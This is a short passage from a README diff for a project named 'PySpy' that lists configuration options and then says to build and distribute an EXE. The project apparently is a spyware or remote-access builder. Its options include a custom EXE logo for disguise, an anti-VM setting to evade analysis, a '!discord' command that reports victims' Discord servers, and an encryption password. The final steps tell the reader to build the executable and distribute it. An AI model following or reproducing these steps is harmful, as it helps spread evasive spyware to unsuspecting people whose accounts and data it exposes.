LunarrBlue/PySpy/README.md

    - "app_logo" -> Path to EXE logo
    - "members" -> Mimimum members in a Discord server to be shown by `!discord`
    - "anti-vm" -> Defines if anti-vm should be enabled
+   - "password" -> Password for encryption and decryption
 3. Run `build.bat` and wait
 4. Distribute the EXE located in `dist`
 ---